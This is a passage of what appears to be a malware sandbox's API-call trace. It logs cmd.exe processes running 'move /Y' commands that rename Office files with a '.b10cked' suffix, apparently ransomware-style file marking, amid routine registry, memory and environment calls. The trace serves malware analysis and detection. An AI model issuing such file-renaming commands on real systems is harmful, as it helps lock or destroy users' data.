_String2="Path=C:", _MaxCount=0x7) returned -13 [0169.624] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0169.624] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0169.624] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0169.624] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0169.624] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0169.624] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0169.624] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0169.624] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0169.624] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0169.624] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0169.624] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0169.624] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0169.625] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0169.625] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0169.625] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0169.625] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0169.625] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0169.625] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0169.626] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0169.626] _wcsicmp (_String1="OMSINT~1.TRX", _String2=".") returned 65 [0169.626] _wcsicmp (_String1="OMSINT~1.TRX", _String2="..") returned 65 [0169.626] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\OMSINT~1.TRX" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082\\omsint~1.trx")) returned 0x2020 [0169.626] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x3d1f20 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0169.626] SetErrorMode (uMode=0x0) returned 0x0 [0169.626] SetErrorMode (uMode=0x1) returned 0x0 [0169.626] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\OMSINT~1.TRX", nBufferLength=0x104, lpBuffer=0x2ae9d4, lpFilePart=0x2ae9bc | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\OMSINT~1.TRX", lpFilePart=0x2ae9bc*="OMSINT~1.TRX") returned 0x3c [0169.626] SetErrorMode (uMode=0x0) returned 0x1 [0169.626] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082")) returned 0x2012 [0169.627] _wcsicmp (_String1="OMSINT~1.TRX", _String2=".") returned 65 [0169.627] _wcsicmp (_String1="OMSINT~1.TRX", _String2="..") returned 65 [0169.627] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\OMSINT~1.TRX" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082\\omsint~1.trx")) returned 0x2020 [0169.627] SetErrorMode (uMode=0x0) returned 0x0 [0169.627] SetErrorMode (uMode=0x1) returned 0x0 [0169.627] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\OMSINT~1.TRX", nBufferLength=0x104, lpBuffer=0x2aee50, lpFilePart=0x2aebe8 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\OMSINT~1.TRX", lpFilePart=0x2aebe8*="OMSINT~1.TRX") returned 0x3c [0169.627] SetErrorMode (uMode=0x0) returned 0x1 [0169.627] SetErrorMode (uMode=0x0) returned 0x0 [0169.627] SetErrorMode (uMode=0x1) returned 0x0 [0169.627] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\OMSINTL.DLL.trx_dll.b10cked", nBufferLength=0x104, lpBuffer=0x2af058, lpFilePart=0x2aebe8 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\OMSINTL.DLL.trx_dll.b10cked", lpFilePart=0x2aebe8*="OMSINTL.DLL.trx_dll.b10cked") returned 0x4b [0169.627] SetErrorMode (uMode=0x0) returned 0x1 [0169.627] SetLastError (dwErrCode=0x0) [0169.627] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\OMSINTL.DLL.trx_dll.b10cked" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082\\omsintl.dll.trx_dll.b10cked")) returned 0xffffffff [0169.627] GetLastError () returned 0x2 [0169.628] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\OMSINT~1.TRX", fInfoLevelId=0x1, lpFindFileData=0x2ae564, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2ae564) returned 0x3d2130 [0169.628] FindNextFileW (in: hFindFile=0x3d2130, lpFindFileData=0x2ae564 | out: lpFindFileData=0x2ae564) returned 0 [0169.628] GetLastError () returned 0x12 [0169.628] FindClose (in: hFindFile=0x3d2130 | out: hFindFile=0x3d2130) returned 1 [0169.630] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\OMSINT~1.TRX", fInfoLevelId=0x1, lpFindFileData=0x3d1cc0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3d1cc0) returned 0x3d2130 [0169.630] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\OMSINTL.DLL.trx_dll.b10cked", nBufferLength=0x104, lpBuffer=0x2ae7fc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\OMSINTL.DLL.trx_dll.b10cked", lpFilePart=0x0) returned 0x4b [0169.630] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\OMSINTL.DLL.trx_dll", nBufferLength=0x104, lpBuffer=0x2ae7fc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\OMSINTL.DLL.trx_dll", lpFilePart=0x0) returned 0x43 [0169.630] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\OMSINTL.DLL.trx_dll" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082\\omsintl.dll.trx_dll")) returned 0x2020 [0169.631] MoveFileExW (lpExistingFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\OMSINTL.DLL.trx_dll" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082\\omsintl.dll.trx_dll"), lpNewFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\OMSINTL.DLL.trx_dll.b10cked" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082\\omsintl.dll.trx_dll.b10cked"), dwFlags=0x3) returned 1 [0169.633] FindClose (in: hFindFile=0x3d2130 | out: hFindFile=0x3d2130) returned 1 [0169.633] _vsnwprintf (in: _Buffer=0x4a9e5040, _BufferCount=0x103, _Format="%9d", _ArgList=0x2ae7b0 | out: _Buffer=" 1") returned 9 [0169.633] _get_osfhandle (_FileHandle=1) returned 0x7 [0169.633] GetFileType (hFile=0x7) returned 0x2 [0169.634] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0169.634] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x2ae73c | out: lpMode=0x2ae73c) returned 1 [0169.634] _get_osfhandle (_FileHandle=1) returned 0x7 [0169.634] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x2ae770 | out: lpConsoleScreenBufferInfo=0x2ae770) returned 1 [0169.634] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="%1 file(s) moved.\r\n") returned 0x13 [0169.635] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x2ae7b0 | out: lpBuffer=" 1 file(s) moved.\r\n") returned 0x1a [0169.635] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x1a, lpNumberOfCharsWritten=0x2ae794, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x2ae794*=0x1a) returned 1 [0169.635] _get_osfhandle (_FileHandle=1) returned 0x7 [0169.635] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0169.635] _get_osfhandle (_FileHandle=1) returned 0x7 [0169.635] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0169.635] _get_osfhandle (_FileHandle=0) returned 0x3 [0169.635] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0169.635] SetConsoleInputExeNameW () returned 0x1 [0169.635] GetConsoleOutputCP () returned 0x1b5 [0169.636] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0169.636] SetThreadUILanguage (LangId=0x0) returned 0x409 [0169.636] exit (_Code=0) Process: id = "291" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16c00" os_pid = "0x888" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\ONINTL~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\ONINTL.DLL.trx_dll.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 22889 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 22890 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 22891 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 22892 start_va = 0xb0000 end_va = 0x1affff entry_point = 0x0 region_type = private name = "private_0x00000000000b0000" filename = "" Region: id = 22893 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 22894 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 22895 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 22896 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 22897 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 22898 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 23453 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 23454 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 23455 start_va = 0x60000 end_va = 0x6ffff entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 23456 start_va = 0x1b0000 end_va = 0x216fff entry_point = 0x1b0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 23457 start_va = 0x380000 end_va = 0x47ffff entry_point = 0x0 region_type = private name = "private_0x0000000000380000" filename = "" Region: id = 23458 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 23459 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 23460 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 23461 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 23462 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 23463 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 23464 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 23465 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 23466 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 23467 start_va = 0x220000 end_va = 0x2e7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000220000" filename = "" Region: id = 23468 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 23469 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 23470 start_va = 0x50000 end_va = 0x56fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 23471 start_va = 0x70000 end_va = 0x71fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000070000" filename = "" Region: id = 23472 start_va = 0x80000 end_va = 0x80fff entry_point = 0x0 region_type = private name = "private_0x0000000000080000" filename = "" Region: id = 23473 start_va = 0x90000 end_va = 0x90fff entry_point = 0x0 region_type = private name = "private_0x0000000000090000" filename = "" Region: id = 23474 start_va = 0x480000 end_va = 0x580fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000480000" filename = "" Region: id = 23475 start_va = 0x590000 end_va = 0x118ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000590000" filename = "" Region: id = 23476 start_va = 0x1190000 end_va = 0x12f2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001190000" filename = "" Thread: id = 356 os_tid = 0x898 [0172.269] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1afe84 | out: lpSystemTimeAsFileTime=0x1afe84*(dwLowDateTime=0x9c9491a0, dwHighDateTime=0x1d440a9)) [0172.269] GetCurrentProcessId () returned 0x888 [0172.269] GetCurrentThreadId () returned 0x898 [0172.269] GetTickCount () returned 0x32367 [0172.269] QueryPerformanceCounter (in: lpPerformanceCount=0x1afe7c | out: lpPerformanceCount=0x1afe7c*=22905811491) returned 1 [0172.269] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0172.269] __set_app_type (_Type=0x1) [0172.269] __p__fmode () returned 0x76b331f4 [0172.270] __p__commode () returned 0x76b331fc [0172.270] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0172.270] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0172.270] GetCurrentThreadId () returned 0x898 [0172.270] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x898) returned 0x38 [0172.270] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0172.270] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0172.270] SetThreadUILanguage (LangId=0x0) returned 0x409 [0172.270] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0172.270] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x1afe14 | out: phkResult=0x1afe14*=0x0) returned 0x2 [0172.270] VirtualQuery (in: lpAddress=0x1afe4b, lpBuffer=0x1afde4, dwLength=0x1c | out: lpBuffer=0x1afde4*(BaseAddress=0x1af000, AllocationBase=0xb0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0172.271] VirtualQuery (in: lpAddress=0xb0000, lpBuffer=0x1afde4, dwLength=0x1c | out: lpBuffer=0x1afde4*(BaseAddress=0xb0000, AllocationBase=0xb0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0172.271] VirtualQuery (in: lpAddress=0xb1000, lpBuffer=0x1afde4, dwLength=0x1c | out: lpBuffer=0x1afde4*(BaseAddress=0xb1000, AllocationBase=0xb0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0172.271] VirtualQuery (in: lpAddress=0xb3000, lpBuffer=0x1afde4, dwLength=0x1c | out: lpBuffer=0x1afde4*(BaseAddress=0xb3000, AllocationBase=0xb0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0172.271] VirtualQuery (in: lpAddress=0x1b0000, lpBuffer=0x1afde4, dwLength=0x1c | out: lpBuffer=0x1afde4*(BaseAddress=0x1b0000, AllocationBase=0x1b0000, AllocationProtect=0x2, RegionSize=0x67000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0172.271] GetConsoleOutputCP () returned 0x1b5 [0172.271] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0172.271] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0172.271] _get_osfhandle (_FileHandle=1) returned 0x7 [0172.271] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0172.271] _get_osfhandle (_FileHandle=1) returned 0x7 [0172.271] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0172.271] _get_osfhandle (_FileHandle=1) returned 0x7 [0172.271] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0172.271] _get_osfhandle (_FileHandle=0) returned 0x3 [0172.271] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0172.272] _get_osfhandle (_FileHandle=0) returned 0x3 [0172.272] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0172.272] GetEnvironmentStringsW () returned 0x390210* [0172.272] FreeEnvironmentStringsW (penv=0x390210) returned 1 [0172.272] GetEnvironmentStringsW () returned 0x390210* [0172.272] FreeEnvironmentStringsW (penv=0x390210) returned 1 [0172.272] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x1aed84 | out: phkResult=0x1aed84*=0x40) returned 0x0 [0172.272] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x1aed8c, lpData=0x1aed90, lpcbData=0x1aed88*=0x1000 | out: lpType=0x1aed8c*=0x0, lpData=0x1aed90*=0xa0, lpcbData=0x1aed88*=0x1000) returned 0x2 [0172.272] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x1aed8c, lpData=0x1aed90, lpcbData=0x1aed88*=0x1000 | out: lpType=0x1aed8c*=0x4, lpData=0x1aed90*=0x1, lpcbData=0x1aed88*=0x4) returned 0x0 [0172.272] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x1aed8c, lpData=0x1aed90, lpcbData=0x1aed88*=0x1000 | out: lpType=0x1aed8c*=0x0, lpData=0x1aed90*=0x1, lpcbData=0x1aed88*=0x1000) returned 0x2 [0172.272] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x1aed8c, lpData=0x1aed90, lpcbData=0x1aed88*=0x1000 | out: lpType=0x1aed8c*=0x4, lpData=0x1aed90*=0x0, lpcbData=0x1aed88*=0x4) returned 0x0 [0172.272] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x1aed8c, lpData=0x1aed90, lpcbData=0x1aed88*=0x1000 | out: lpType=0x1aed8c*=0x4, lpData=0x1aed90*=0x40, lpcbData=0x1aed88*=0x4) returned 0x0 [0172.272] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x1aed8c, lpData=0x1aed90, lpcbData=0x1aed88*=0x1000 | out: lpType=0x1aed8c*=0x4, lpData=0x1aed90*=0x40, lpcbData=0x1aed88*=0x4) returned 0x0 [0172.272] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x1aed8c, lpData=0x1aed90, lpcbData=0x1aed88*=0x1000 | out: lpType=0x1aed8c*=0x0, lpData=0x1aed90*=0x40, lpcbData=0x1aed88*=0x1000) returned 0x2 [0172.272] RegCloseKey (hKey=0x40) returned 0x0 [0172.272] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x1aed84 | out: phkResult=0x1aed84*=0x40) returned 0x0 [0172.273] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x1aed8c, lpData=0x1aed90, lpcbData=0x1aed88*=0x1000 | out: lpType=0x1aed8c*=0x0, lpData=0x1aed90*=0x40, lpcbData=0x1aed88*=0x1000) returned 0x2 [0172.273] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x1aed8c, lpData=0x1aed90, lpcbData=0x1aed88*=0x1000 | out: lpType=0x1aed8c*=0x4, lpData=0x1aed90*=0x1, lpcbData=0x1aed88*=0x4) returned 0x0 [0172.273] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x1aed8c, lpData=0x1aed90, lpcbData=0x1aed88*=0x1000 | out: lpType=0x1aed8c*=0x0, lpData=0x1aed90*=0x1, lpcbData=0x1aed88*=0x1000) returned 0x2 [0172.273] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x1aed8c, lpData=0x1aed90, lpcbData=0x1aed88*=0x1000 | out: lpType=0x1aed8c*=0x4, lpData=0x1aed90*=0x0, lpcbData=0x1aed88*=0x4) returned 0x0 [0172.273] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x1aed8c, lpData=0x1aed90, lpcbData=0x1aed88*=0x1000 | out: lpType=0x1aed8c*=0x4, lpData=0x1aed90*=0x9, lpcbData=0x1aed88*=0x4) returned 0x0 [0172.273] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x1aed8c, lpData=0x1aed90, lpcbData=0x1aed88*=0x1000 | out: lpType=0x1aed8c*=0x4, lpData=0x1aed90*=0x9, lpcbData=0x1aed88*=0x4) returned 0x0 [0172.273] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x1aed8c, lpData=0x1aed90, lpcbData=0x1aed88*=0x1000 | out: lpType=0x1aed8c*=0x0, lpData=0x1aed90*=0x9, lpcbData=0x1aed88*=0x1000) returned 0x2 [0172.273] RegCloseKey (hKey=0x40) returned 0x0 [0172.273] time (in: timer=0x0 | out: timer=0x0) returned 0x5b886388 [0172.273] srand (_Seed=0x5b886388) [0172.273] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\ONINTL~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\ONINTL.DLL.trx_dll.b10cked\"" [0172.273] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\ONINTL~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\ONINTL.DLL.trx_dll.b10cked\"" [0172.273] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0172.273] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x391970, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0172.273] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0172.274] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0172.274] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0172.274] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0172.274] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0172.274] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0172.274] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0172.274] _wcsicmp 